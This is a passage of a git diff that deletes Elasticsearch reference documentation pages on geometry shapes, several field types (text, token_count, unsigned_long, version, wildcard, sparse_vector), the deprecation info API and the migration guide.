-|`MultiPoint` |`MULTIPOINT` |`multipoint` |An array of unconnected, but likely related -points. -|`MultiLineString` |`MULTILINESTRING` |`multilinestring` |An array of separate linestrings. -|`MultiPolygon` |`MULTIPOLYGON` |`multipolygon` |An array of separate polygons. -|`GeometryCollection` |`GEOMETRYCOLLECTION` |`geometrycollection` | A shape collection similar to the -`multi*` shapes except that multiple types can coexist (e.g., a Point and a LineString). -|`N/A` |`BBOX` |`envelope` |A bounding rectangle, or envelope, specified by -specifying only the top left and bottom right points. -|======================================================================= - -[NOTE] -============================================= -For all types, both the inner `type` and `coordinates` fields are required. - -In GeoJSON and WKT, and therefore Elasticsearch, the correct *coordinate order is (X, Y)* -within coordinate arrays. This differs from many Geospatial APIs (e.g., `geo_shape`) that -typically use the colloquial latitude, longitude (Y, X) ordering. -============================================= - -[[point-shape]] -[discrete] -===== http://geojson.org/geojson-spec.html#id2[Point] - -A point is a single coordinate in cartesian `x, y` space. It may represent the -location of an item of interest in a virtual world or projected space. The -following is an example of a point in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "point", - "coordinates" : [-377.03653, 389.897676] - } -} --------------------------------------------------- - -The following is an example of a point in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POINT (-377.03653 389.897676)" -} --------------------------------------------------- - -[discrete] -[[linestring]] -===== http://geojson.org/geojson-spec.html#id3[LineString] - -A `linestring` defined by an array of two or more positions. By -specifying only two points, the `linestring` will represent a straight -line. Specifying more than two points creates an arbitrary path. The -following is an example of a LineString in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "linestring", - "coordinates" : [[-377.03653, 389.897676], [-377.009051, 389.889939]] - } -} --------------------------------------------------- - -The following is an example of a LineString in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "LINESTRING (-377.03653 389.897676, -377.009051 389.889939)" -} --------------------------------------------------- - -[discrete] -[[polygon]] -===== http://geojson.org/geojson-spec.html#id4[Polygon] - -A polygon is defined by a list of a list of points. The first and last -points in each (outer) list must be the same (the polygon must be -closed). The following is an example of a Polygon in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [1000.0, -1001.0], [1001.0, -1001.0], [1001.0, -1000.0], [1000.0, -1000.0], [1000.0, -1001.0] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((1000.0 -1001.0, 1001.0 -1001.0, 1001.0 -1000.0, 1000.0 -1000.0, 1000.0 -1001.0))" -} --------------------------------------------------- - -The first array represents the outer boundary of the polygon, the other -arrays represent the interior shapes ("holes"). The following is a GeoJSON example -of a polygon with a hole: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [1000.0, -1001.0], [1001.0, -1001.0], [1001.0, -1000.0], [1000.0, -1000.0], [1000.0, -1001.0] ], - [ [1000.2, -1001.2], [1000.8, -1001.2], [1000.8, -1001.8], [1000.2, -1001.8], [1000.2, -1001.2] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon with a hole in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((1000.0 1000.0, 1001.0 1000.0, 1001.0 1001.0, 1000.0 1001.0, 1000.0 1000.0), (1000.2 1000.2, 1000.8 1000.2, 1000.8 1000.8, 1000.2 1000.8, 1000.2 1000.2))" -} --------------------------------------------------- - -*IMPORTANT NOTE:* WKT does not enforce a specific order for vertices. -https://tools.ietf.org/html/rfc7946#section-3.1.6[GeoJSON] mandates that the -outer polygon must be counterclockwise and interior shapes must be clockwise, -which agrees with the Open Geospatial Consortium (OGC) -https://www.opengeospatial.org/standards/sfa[Simple Feature Access] -specification for vertex ordering. - -By default Elasticsearch expects vertices in counterclockwise (right hand rule) -order. If data is provided in clockwise order (left hand rule) the user can change -the `orientation` parameter either in the field mapping, or as a parameter provided -with the document. - -The following is an example of overriding the `orientation` parameters on a document: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "orientation" : "clockwise", - "coordinates" : [ - [ [1000.0, 1000.0], [1000.0, 1001.0], [1001.0, 1001.0], [1001.0, 1000.0], [1000.0, 1000.0] ] - ] - } -} --------------------------------------------------- - -[discrete] -[[multipoint]] -===== http://geojson.org/geojson-spec.html#id5[MultiPoint] - -The following is an example of a list of geojson points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipoint", - "coordinates" : [ - [1002.0, 1002.0], [1003.0, 2000.0] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOINT (1002.0 2000.0, 1003.0 2000.0)" -} --------------------------------------------------- - -[discrete] -[[multilinestring]] -===== http://geojson.org/geojson-spec.html#id6[MultiLineString] - -The following is an example of a list of geojson linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multilinestring", - "coordinates" : [ - [ [1002.0, 200.0], [1003.0, 200.0], [1003.0, 300.0], [1002.0, 300.0] ], - [ [1000.0, 100.0], [1001.0, 100.0], [1001.0, 100.0], [1000.0, 100.0] ], - [ [1000.2, 100.2], [1000.8, 100.2], [1000.8, 100.8], [1000.2, 100.8] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTILINESTRING ((1002.0 200.0, 1003.0 200.0, 1003.0 300.0, 1002.0 300.0), (1000.0 100.0, 1001.0 100.0, 1001.0 100.0, 1000.0 100.0), (1000.2 0.2, 1000.8 100.2, 1000.8 100.8, 1000.2 100.8))" -} --------------------------------------------------- - -[discrete] -[[multipolygon]] -===== http://geojson.org/geojson-spec.html#id7[MultiPolygon] - -The following is an example of a list of geojson polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipolygon", - "coordinates" : [ - [ [[1002.0, 200.0], [1003.0, 200.0], [1003.0, 300.0], [1002.0, 300.0], [1002.0, 200.0]] ], - [ [[1000.0, 200.0], [1001.0, 100.0], [1001.0, 100.0], [1000.0, 100.0], [1000.0, 100.0]], - [[1000.2, 200.2], [1000.8, 100.2], [1000.8, 100.8], [1000.2, 100.8], [1000.2, 100.2]] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOLYGON (((1002.0 200.0, 1003.0 200.0, 1003.0 300.0, 1002.0 300.0, 102.0 200.0)), ((1000.0 100.0, 1001.0 100.0, 1001.0 100.0, 1000.0 100.0, 1000.0 100.0), (1000.2 100.2, 1000.8 100.2, 1000.8 100.8, 1000.2 100.8, 1000.2 100.2)))" -} --------------------------------------------------- - -[discrete] -[[geometry_collection]] -===== http://geojson.org/geojson-spec.html#geometrycollection[Geometry Collection] - -The following is an example of a collection of geojson geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type": "geometrycollection", - "geometries": [ - { - "type": "point", - "coordinates": [1000.0, 100.0] - }, - { - "type": "linestring", - "coordinates": [ [1001.0, 100.0], [1002.0, 100.0] ] - } - ] - } -} --------------------------------------------------- - -The following is an example of a collection of WKT geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "GEOMETRYCOLLECTION (POINT (1000.0 100.0), LINESTRING (1001.0 100.0, 1002.0 100.0))" -} --------------------------------------------------- - -[discrete] -===== Envelope - -Elasticsearch supports an `envelope` type, which consists of coordinates -for upper left and lower right points of the shape to represent a -bounding rectangle in the format `[[minX, maxY], [maxX, minY]]`: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "envelope", - "coordinates" : [ [1000.0, 100.0], [1001.0, 100.0] ] - } -} --------------------------------------------------- - -The following is an example of an envelope using the WKT BBOX format: - -*NOTE:* WKT specification expects the following order: minLon, maxLon, maxLat, minLat. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "BBOX (1000.0, 1002.0, 2000.0, 1000.0)" -} --------------------------------------------------- - -[discrete] -==== Sorting and Retrieving index Shapes - -Due to the complex input structure and index representation of shapes, -it is not currently possible to sort shapes or retrieve their fields -directly. The `shape` value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/sparse-vector.asciidoc b/docs/reference/mapping/types/sparse-vector.asciidoc deleted file mode 100644 index 2d3a86f3416..00000000000 --- a/docs/reference/mapping/types/sparse-vector.asciidoc +++ /dev/null @@ -1,63 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[sparse-vector]] -=== Sparse vector data type -++++ -Sparse vector -++++ - -deprecated[7.6, The `sparse_vector` type is deprecated and will be removed in 8.0.] - -A `sparse_vector` field stores sparse vectors of float values. -The maximum number of dimensions that can be in a vector should -not exceed 1024. The number of dimensions can be -different across documents. A `sparse_vector` field is -a single-valued field. - -These vectors can be used for <>. -For example, a document score can represent a distance between -a given query vector and the indexed document vector. - -You represent a sparse vector as an object, where object fields -are dimensions, and fields values are values for these dimensions. -Dimensions are integer values from `0` to `65535` encoded as strings. -Dimensions don't need to be in order. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_vector": { - "type": "sparse_vector" - }, - "my_text" : { - "type" : "keyword" - } - } - } -} --------------------------------------------------- -// TEST[warning:The [sparse_vector] field type is deprecated and will be removed in 8.0.] - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_text" : "text1", - "my_vector" : {"1": 0.5, "5": -0.5, "100": 1} -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "text2", - "my_vector" : {"103": 0.5, "4": -0.5, "5": 1, "11" : 1.2} -} --------------------------------------------------- -// TEST[continued] - -Internally, each document's sparse vector is encoded as a binary -doc value. Its size in bytes is equal to -`6 * NUMBER_OF_DIMENSIONS + 4`, where `NUMBER_OF_DIMENSIONS` - -number of the vector's dimensions. diff --git a/docs/reference/mapping/types/text.asciidoc b/docs/reference/mapping/types/text.asciidoc deleted file mode 100644 index b5ffeb2ef77..00000000000 --- a/docs/reference/mapping/types/text.asciidoc +++ /dev/null @@ -1,256 +0,0 @@ -[[text]] -=== Text field type -++++ -Text -++++ - -A field to index full-text values, such as the body of an email or the -description of a product. These fields are `analyzed`, that is they are passed through an -<> to convert the string into a list of individual terms -before being indexed. The analysis process allows Elasticsearch to search for -individual words _within_ each full text field. Text fields are not -used for sorting and seldom used for aggregations (although the -<> -is a notable exception). - -If you need to index structured content such as email addresses, hostnames, status -codes, or tags, it is likely that you should rather use a <> field. - -Below is an example of a mapping for a text field: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text" - } - } - } -} --------------------------------- - -[[text-multi-fields]] -==== Use a field as both text and keyword -Sometimes it is useful to have both a full text (`text`) and a keyword -(`keyword`) version of the same field: one for full text search and the -other for aggregations and sorting. This can be achieved with -<>. - -[[text-params]] -==== Parameters for text fields - -The following parameters are accepted by `text` fields: - -[horizontal] - -<>:: - - The <> which should be used for - the `text` field, both at index-time and at - search-time (unless overridden by the <>). - Defaults to the default index analyzer, or the - <>. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or `false` - (default). Enabling this is a good idea on fields that are frequently used for - (significant) terms aggregations. - -<>:: - - Can the field use in-memory fielddata for sorting, aggregations, - or scripting? Accepts `true` or `false` (default). - -<>:: - - Expert settings which allow to decide which values to load in memory when `fielddata` - is enabled. By default all values are loaded. - -<>:: - - Multi-fields allow the same string value to be indexed in multiple ways for - different purposes, such as one field for search and a multi-field for - sorting and aggregations, or the same string value analyzed by different - analyzers. - -<>:: - - Should the field be searchable? Accepts `true` (default) or `false`. - -<>:: - - What information should be stored in the index, for search and highlighting purposes. - Defaults to `positions`. - -<>:: - - If enabled, term prefixes of between 2 and 5 characters are indexed into a - separate field. This allows prefix searches to run more efficiently, at - the expense of a larger index. - -<>:: - - If enabled, two-term word combinations ('shingles') are indexed into a separate - field. This allows exact phrase queries (no slop) to run more efficiently, at the expense - of a larger index. Note that this works best when stopwords are not removed, - as phrases containing stopwords will not use the subsidiary field and will fall - back to a standard phrase query. Accepts `true` or `false` (default). - -<>:: - - Whether field-length should be taken into account when scoring queries. - Accepts `true` (default) or `false`. - -<>:: - - The number of fake term position which should be inserted between each - element of an array of strings. Defaults to the `position_increment_gap` - configured on the analyzer which defaults to `100`. `100` was chosen because it - prevents phrase queries with reasonably large slops (less than 100) from - matching terms across field values. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). - -<>:: - - The <> that should be used at search time on - the `text` field. Defaults to the `analyzer` setting. - -<>:: - - The <> that should be used at search time when a - phrase is encountered. Defaults to the `search_analyzer` setting. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -<>:: - - Whether term vectors should be stored for the field. Defaults to `no`. - -<>:: - - Metadata about the field. - -[[fielddata-mapping-param]] -==== `fielddata` mapping parameter - -`text` fields are searchable by default, but by default are not available for -aggregations, sorting, or scripting. If you try to sort, aggregate, or access -values from a script on a `text` field, you will see this exception: - -Fielddata is disabled on text fields by default. Set `fielddata=true` on -`your_field_name` in order to load fielddata in memory by uninverting the -inverted index. Note that this can however use significant memory. - -Field data is the only way to access the analyzed tokens from a full text field -in aggregations, sorting, or scripting. For example, a full text field like `New York` -would get analyzed as `new` and `york`. To aggregate on these tokens requires field data. - -[[before-enabling-fielddata]] -==== Before enabling fielddata - -It usually doesn't make sense to enable fielddata on text fields. Field data -is stored in the heap with the <> because it -is expensive to calculate. Calculating the field data can cause latency spikes, and -increasing heap usage is a cause of cluster performance issues. - -Most users who want to do more with text fields use <> -by having both a `text` field for full text searches, and an -unanalyzed <> field for aggregations, as follows: - -[source,console] ---------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_field": { <1> - "type": "text", - "fields": { - "keyword": { <2> - "type": "keyword" - } - } - } - } - } -} ---------------------------------- - -<1> Use the `my_field` field for searches. -<2> Use the `my_field.keyword` field for aggregations, sorting, or in scripts. - -[[enable-fielddata-text-fields]] -==== Enabling fielddata on `text` fields - -You can enable fielddata on an existing `text` field using the -<> as follows: - -[source,console] ------------------------------------ -PUT my-index-000001/_mapping -{ - "properties": { - "my_field": { <1> - "type": "text", - "fielddata": true - } - } -} ------------------------------------ -// TEST[continued] - -<1> The mapping that you specify for `my_field` should consist of the existing - mapping for that field, plus the `fielddata` parameter. - -[[field-data-filtering]] -==== `fielddata_frequency_filter` mapping parameter - -Fielddata filtering can be used to reduce the number of terms loaded into -memory, and thus reduce memory usage. Terms can be filtered by _frequency_: - -The frequency filter allows you to only load terms whose document frequency falls -between a `min` and `max` value, which can be expressed an absolute -number (when the number is bigger than 1.0) or as a percentage -(eg `0.01` is `1%` and `1.0` is `100%`). Frequency is calculated -*per segment*. Percentages are based on the number of docs which have a -value for the field, as opposed to all docs in the segment. - -Small segments can be excluded completely by specifying the minimum -number of docs that the segment should contain with `min_segment_size`: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "tag": { - "type": "text", - "fielddata": true, - "fielddata_frequency_filter": { - "min": 0.001, - "max": 0.1, - "min_segment_size": 500 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/mapping/types/token-count.asciidoc b/docs/reference/mapping/types/token-count.asciidoc deleted file mode 100644 index 31ed2ba0e44..00000000000 --- a/docs/reference/mapping/types/token-count.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[token-count]] -=== Token count field type -++++ -Token count -++++ - -A field of type `token_count` is really an <> field which -accepts string values, analyzes them, then indexes the number of tokens in the -string. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { <1> - "type": "text", - "fields": { - "length": { <2> - "type": "token_count", - "analyzer": "standard" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "name": "John Smith" } - -PUT my-index-000001/_doc/2 -{ "name": "Rachel Alice Williams" } - -GET my-index-000001/_search -{ - "query": { - "term": { - "name.length": 3 <3> - } - } -} --------------------------------------------------- - -<1> The `name` field is a <> field which uses the default -`standard` analyzer. -<2> The `name.length` field is a `token_count` <> which will index the number of tokens in the `name` field. -<3> This query matches only the document containing `Rachel Alice Williams`, as it contains three tokens. - - -[[token-count-params]] -==== Parameters for `token_count` fields - -The following parameters are accepted by `token_count` fields: - -[horizontal] - -<>:: - - The <> which should be used to analyze the string - value. Required. For best performance, use an analyzer without token - filters. - -`enable_position_increments`:: - -Indicates if position increments should be counted. -Set to `false` if you don't want to count tokens removed by analyzer filters (like <>). -Defaults to `true`. - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a numeric value of the same `type` as the field which is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/unsigned_long.asciidoc b/docs/reference/mapping/types/unsigned_long.asciidoc deleted file mode 100644 index 6e7ace01b63..00000000000 --- a/docs/reference/mapping/types/unsigned_long.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[unsigned-long]] -=== Unsigned long field type -++++ -Unsigned long -++++ -Unsigned long is a numeric field type that represents an unsigned 64-bit -integer with a minimum value of 0 and a maximum value of +2^64^-1+ -(from 0 to 18446744073709551615 inclusive). - -[source,console] --------------------------------------------------- -PUT my_index -{ - "mappings": { - "properties": { - "my_counter": { - "type": "unsigned_long" - } - } - } -} --------------------------------------------------- - -Unsigned long can be indexed in a numeric or string form, -representing integer values in the range [0, 18446744073709551615]. -They can't have a decimal part. - -[source,console] --------------------------------- -POST /my_index/_bulk?refresh -{"index":{"_id":1}} -{"my_counter": 0} -{"index":{"_id":2}} -{"my_counter": 9223372036854775808} -{"index":{"_id":3}} -{"my_counter": 18446744073709551614} -{"index":{"_id":4}} -{"my_counter": 18446744073709551615} --------------------------------- -//TEST[continued] - -Term queries accept any numbers in a numeric or string form. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "term" : { - "my_counter" : 18446744073709551615 - } - } -} --------------------------------- -//TEST[continued] - -Range query terms can contain values with decimal parts. -In this case {es} converts them to integer values: -`gte` and `gt` terms are converted to the nearest integer up inclusive, -and `lt` and `lte` ranges are converted to the nearest integer down inclusive. - -It is recommended to pass ranges as strings to ensure they are parsed -without any loss of precision. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "range" : { - "my_counter" : { - "gte" : "9223372036854775808.5", - "lte" : "18446744073709551615" - } - } - } -} --------------------------------- -//TEST[continued] - - -For queries with sort on an `unsigned_long` field, -for a particular document {es} returns a sort value of the type `long` -if the value of this document is within the range of long values, -or of the type `BigInteger` if the value exceeds this range. - -NOTE: REST clients need to be able to handle big integer values -in JSON to support this field type correctly. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "match_all" : {} - }, - "sort" : {"my_counter" : "desc"} -} --------------------------------- -//TEST[continued] - - -==== Unsigned long in scripts -Currently unsigned_long is not supported in scripts. - -==== Stored fields -A stored field of `unsigned_long` is stored and returned as `String`. - -==== Aggregations -For `terms` aggregations, similarly to sort values, `Long` or -`BigInteger` values are used. For other aggregations, -values are converted to the `double` type. - -==== Queries with mixed numeric types - -Searches with mixed numeric types one of which is `unsigned_long` are -supported, except queries with sort. Thus, a sort query across two indexes -where the same field name has an `unsigned_long` type in one index, -and `long` type in another, doesn't produce correct results and must -be avoided. If there is a need for such kind of sorting, script based sorting -can be used instead. - -Aggregations across several numeric types one of which is `unsigned_long` are -supported. In this case, values are converted to the `double` type. diff --git a/docs/reference/mapping/types/version.asciidoc b/docs/reference/mapping/types/version.asciidoc deleted file mode 100644 index a1dfc693955..00000000000 --- a/docs/reference/mapping/types/version.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[version]] -=== Version field type -++++ -Version -++++ - -The `version` field type is a specialization of the `keyword` field for -handling software version values and to support specialized precedence -rules for them. Precedence is defined following the rules outlined by -https://semver.org/[Semantic Versioning], which for example means that -major, minor and patch version parts are sorted numerically (i.e. -"2.1.0" < "2.4.1" < "2.11.2") and pre-release versions are sorted before -release versions (i.e. "1.0.0-alpha" < "1.0.0"). - -You index a `version` field as follows - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_version": { - "type": "version" - } - } - } -} - --------------------------------------------------- - -The field offers the same search capabilities as a regular keyword field. It -can e.g. be searched for exact matches using `match` or `term` queries and -supports prefix and wildcard searches. The main benefit is that `range` queries -will honor Semver ordering, so a `range` query between "1.0.0" and "1.5.0" -will include versions of "1.2.3" but not "1.11.2" for example. Note that this -would be different when using a regular `keyword` field for indexing where ordering -is alphabetical. - -Software versions are expected to follow the -https://semver.org/[Semantic Versioning rules] schema and precedence rules with -the notable exception that more or less than three main version identifiers are -allowed (i.e. "1.2" or "1.2.3.4" qualify as valid versions while they wouldn't under -strict Semver rules). Version strings that are not valid under the Semver definition -(e.g. "1.2.alpha.4") can still be indexed and retrieved as exact matches, however they -will all appear _after_ any valid version with regular alphabetical ordering. The empty -String "" is considered invalid and sorted after all valid versions, but before other -invalid ones. - -[discrete] -[[version-params]] -==== Parameters for version fields - -The following parameters are accepted by `version` fields: - -[horizontal] - -<>:: - - Metadata about the field. - -[discrete] -==== Limitations - -This field type isn't optimized for heavy wildcard, regex or fuzzy searches. While those -type of queries work in this field, you should consider using a regular `keyword` field if -you strongly rely on these kind of queries. - diff --git a/docs/reference/mapping/types/wildcard.asciidoc b/docs/reference/mapping/types/wildcard.asciidoc deleted file mode 100644 index 7f27cd80ea3..00000000000 --- a/docs/reference/mapping/types/wildcard.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[discrete] -[[wildcard-field-type]] -=== Wildcard field type - -A `wildcard` field stores values optimised for wildcard grep-like queries. -Wildcard queries are possible on other field types but suffer from constraints: - -* `text` fields limit matching of any wildcard expressions to individual tokens rather than the original whole value held in a field -* `keyword` fields are untokenized but slow at performing wildcard queries (especially patterns with leading wildcards). - -Internally the `wildcard` field indexes the whole field value using ngrams and stores the full string. -The index is used as a rough filter to cut down the number of values that are then checked by retrieving and checking the full values. -This field is especially well suited to run grep-like queries on log lines. Storage costs are typically lower than those of `keyword` -fields but search speeds for exact matches on full terms are slower. - -You index and search a wildcard field as follows - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_wildcard": { - "type": "wildcard" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "my_wildcard" : "This string can be quite lengthy" -} - -GET my-index-000001/_search -{ - "query": { - "wildcard": { - "my_wildcard": { - "value": "*quite*lengthy" - } - } - } -} - - --------------------------------------------------- - - -[discrete] -[[wildcard-params]] -==== Parameters for wildcard fields - -The following parameters are accepted by `wildcard` fields: - -[horizontal] - -<>:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -<>:: - - Do not index any string longer than this value. Defaults to `2147483647` - so that all values would be accepted. - -[discrete] -==== Limitations - -* `wildcard` fields are untokenized like keyword fields, so do not support queries that rely on word positions such as phrase queries. - diff --git a/docs/reference/migration/apis/deprecation.asciidoc b/docs/reference/migration/apis/deprecation.asciidoc deleted file mode 100644 index 2cc954d3c2b..00000000000 --- a/docs/reference/migration/apis/deprecation.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[migration-api-deprecation]] -=== Deprecation info APIs -++++ -Deprecation info -++++ - -IMPORTANT: Use this API to check for deprecated configuration before performing -a major version upgrade. You should run it on the last minor version of the -major version you are upgrading from, as earlier minor versions may not include -all deprecations. - -The deprecation API is to be used to retrieve information about different -cluster, node, and index level settings that use deprecated features that will -be removed or changed in the next major version. - -[[migration-api-request]] -==== {api-request-title} - -`GET /_migration/deprecations` + - -`GET //_migration/deprecations` - -[[migration-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separate list of data streams or indices to check. Wildcard (`*`) -expressions are supported. -+ -When you specify this parameter, only deprecations for the specified -data streams or indices are returned. - -[[migration-api-example]] -==== {api-examples-title} - -To see the list of offenders in your cluster, submit a GET request to the -`_migration/deprecations` endpoint: - -[source,console] --------------------------------------------------- -GET /_migration/deprecations --------------------------------------------------- -// TEST[skip:cannot assert tests have certain deprecations] - -Example response: - - -["source","js",subs="attributes,callouts,macros"] --------------------------------------------------- -{ - "cluster_settings" : [ - { - "level" : "critical", - "message" : "Cluster name cannot contain ':'", - "url" : "{ref}/breaking-changes-7.0.html#_literal_literal_is_no_longer_allowed_in_cluster_name", - "details" : "This cluster is named [mycompany:logging], which contains the illegal character ':'." - } - ], - "node_settings" : [ ], - "index_settings" : { - "logs:apache" : [ - { - "level" : "warning", - "message" : "Index name cannot contain ':'", - "url" : "{ref}/breaking-changes-7.0.html#_literal_literal_is_no_longer_allowed_in_index_name", - "details" : "This index is named [logs:apache], which contains the illegal character ':'." - } - ] - }, - "ml_settings" : [ ] -} --------------------------------------------------- -// NOTCONSOLE - -The response breaks down all the specific forward-incompatible settings that you -should resolve before upgrading your cluster. Any offending settings are -represented as a deprecation warning. - -The following is an example deprecation warning: - -["source","js",subs="attributes,callouts,macros"] --------------------------------------------------- -{ - "level" : "warning", - "message" : "This is the generic descriptive message of the breaking change", - "url" : "{ref-60}/breaking_60_indices_changes.html", - "details" : "more information, like which nodes, indices, or settings are to blame" -} --------------------------------------------------- -// NOTCONSOLE - -As is shown, there is a `level` property that describes the significance of the -issue. - -|======= -|warning | You can upgrade directly, but you are using deprecated functionality -which will not be available or behave differently in the next major version. -|critical | You cannot upgrade without fixing this problem. -|======= - -The `message` property and the optional `details` property provide descriptive -information about the deprecation warning. The `url` property provides a link to -the Breaking Changes Documentation, where you can find more information about -this change. - -Any cluster-level deprecation warnings can be found under the `cluster_settings` -key. Similarly, any node-level warnings are found under `node_settings`. Since -only a select subset of your nodes might incorporate these settings, it is -important to read the `details` section for more information about which nodes -are affected. Index warnings are sectioned off per index and can be filtered -using an index-pattern in the query. This section includes warnings for the -backing indices of data streams specified in the request path. Machine Learning -related deprecation warnings can be found under the `ml_settings` key. - -The following example request shows only index-level deprecations of all -`logstash-*` indices: - -[source,console] --------------------------------------------------- -GET /logstash-*/_migration/deprecations --------------------------------------------------- -// TEST[skip:cannot assert tests have certain deprecations] diff --git a/docs/reference/migration/index.asciidoc b/docs/reference/migration/index.asciidoc deleted file mode 100644 index b51a22e7ccc..00000000000 --- a/docs/reference/migration/index.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[breaking-changes]] -= Migration guide - -[partintro] --- -This section describes the breaking changes and deprecations introduced in this release -and previous minor versions. - -As {es} introduces new features and improves existing ones, -the changes sometimes make older settings, APIs, and parameters obsolete. -The obsolete functionality is typically deprecated in a minor release and -removed in the subsequent major release. -This enables applications to continue working unchanged across most minor version upgrades. -Breaking changes introduced in minor releases are generally limited to critical security fixes -and bug fixes that correct unintended behavior. - -To get the most out of {es} and facilitate future upgrades, we strongly encourage migrating -away from using deprecated functionality as soon as possible. - -To give you insight into what deprecated features you're using, {es}: - -- Returns a `Warn` HTTP header whenever you submit a request that uses deprecated functionality. -- <> when deprecated functionality is used. -- <> that scans a cluster's configuration -and mappings for deprecated functionality. - -For more information about {minor-version}, -see the <> and <>. -For information about how to upgrade your cluster, see <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::migrate_7_10.asciidoc[] -include::migrate_7_9.asciidoc[] -include::migrate_7_8.asciidoc[] -include::migrate_7_7.asciidoc[] -include::migrate_7_6.asciidoc[] -include::migrate_7_5.asciidoc[] -include::migrate_7_4.asciidoc[] -include::migrate_7_3.asciidoc[] -include::migrate_7_2.asciidoc[] -include::migrate_7_1.asciidoc[] -include::migrate_7_0.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0.asciidoc b/docs/reference/migration/migrate_7_0.asciidoc deleted file mode 100644 index 141e359afa6..00000000000 --- a/docs/reference/migration/migrate_7_0.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ -[[breaking-changes-7.0]] -== Breaking changes in 7.0 -++++ -7.0 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.0. - -See also <> and <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -=== Indices created before 7.0 - -Elasticsearch 7.0 can read indices created in version 6.0 or above. An -Elasticsearch 7.0 node will not start in the presence of indices created in a -version of Elasticsearch before 6.0. - -[IMPORTANT] -.Reindex indices from Elasticsearch 5.x or before -========================================= - -Indices created in Elasticsearch 5.x or before will need to be reindexed with -Elasticsearch 6.x in order to be readable by Elasticsearch 7.x. - -========================================= - -include::migrate_7_0/aggregations.asciidoc[] -include::migrate_7_0/analysis.asciidoc[] 